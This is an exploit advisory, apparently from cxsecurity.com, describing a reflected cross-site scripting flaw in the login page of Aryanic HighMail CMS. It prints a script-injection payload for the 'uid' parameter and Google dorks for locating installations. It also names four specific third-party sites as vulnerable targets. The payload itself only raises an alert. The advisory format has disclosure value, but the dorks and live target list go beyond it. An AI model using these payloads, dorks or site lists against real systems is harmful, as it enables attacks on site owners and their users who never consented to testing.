Aryanic HighMail Cms Cross Site Scripting (XSS)

2020.05.22
ir EbRaHiM-VaKeR (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################### # Exploit Title : Aryanic HighMail Cms Cross Site Scripting (XSS) # Author [ Discovered By ] : EbRaHiM-VaKeR # Team : Iranonymous Team - Mafia Boys # Date : 22/05/2020 # Vendor Homepage : http://www.highmail.org/ - https://www.aryanic.com/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Med # Site: http://iranonymous.ir ################################################################### # Google Dork: [+] intext:Aryanic HighMail [+] intitle:HighMail Web Access ################################################################### # Example Vulnerable Sites : ************************* [+] http://highmail.mshojafar.com/login/?uid= [+] http://mail.book-khamenei.ir/login/?e=f&uid= [+] http://highmail.sce-co.com/login/?e=f&uid= [+] http://mail.maslahat.ir/login/?uid= # Exploit : ************************* uid="><script>alert(/EbRaHiM-VaKeR Was Here :D/)</script> ################################################################### # Discovered By EbRaHiM-VaKeR from IranonymousTm - Mafia Boys We Are: 4min.x / Kaveh_Turk / Mr JxRoot / J3N ###################################################################


See this note in RAW Version
Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top